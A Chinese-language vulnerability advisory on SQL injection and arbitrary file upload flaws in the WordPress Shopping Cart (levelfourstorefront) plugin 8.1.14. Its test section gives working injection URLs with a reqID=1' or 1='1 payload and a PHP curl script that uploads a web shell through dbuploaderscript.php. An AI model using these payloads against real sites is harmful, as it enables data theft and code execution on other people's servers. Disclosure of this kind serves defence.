WordPress Shopping Cart插件多个SQL注入和任意文件上传漏洞

WordPress Shopping Cart插件多个SQL注入和任意文件上传漏洞

发布日期：2012-12-30
更新日期：2013-01-05

受影响系统：
WordPress Shopping Cart 8.1.14
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57101
 
WordPress Shopping Cart插件是购物车系统，具有电子交易功能和管理工具。

WordPress Shopping Cart插件内存在安全漏洞，没有正确验证wp-content/plugins/levelfourstorefront/scripts/administration/backup.php, wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php内的 "reqID" 参数值的合法性，可导致任意SQL代码执行和任意文件上传。
 
<*来源：Sammy Forgit
 
  链接：http://packetstormsecurity.com/files/119217/wplevelfour-sqlshell.txt
        http://www.securelist.com/en/advisories/51690
        http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-shopping-cart-multiple-vulnerability.html
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
## Exploit SQL injection :
 
Database Wordpress :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1
 
Account XLS :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID=1' or 1='1
 
Subscriber XLS :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1
 

## Exploit Arbitrary File Upload:
 
PostShell.php
 <?php
 
$uploadfile = "lo.php";
      $force = "http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php";
      $ch = curl_init("$force");
      curl_setopt($ch, CURLOPT_POST, true); 
      curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile",
            'reqID'=>"1'or 1='1"));
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
      $postResult = curl_exec( $ch );
      curl_close($ch);
     
 print "$postResult";
 
?>
 

Shell Access :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/products/lo.php
 
lo.php
 <?php
 phpinfo();
 ?>
 
# Site : 1337day.com Inj3ct0r Exploit Database

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://wordpress.org/extend/plugins/levelfourstorefront/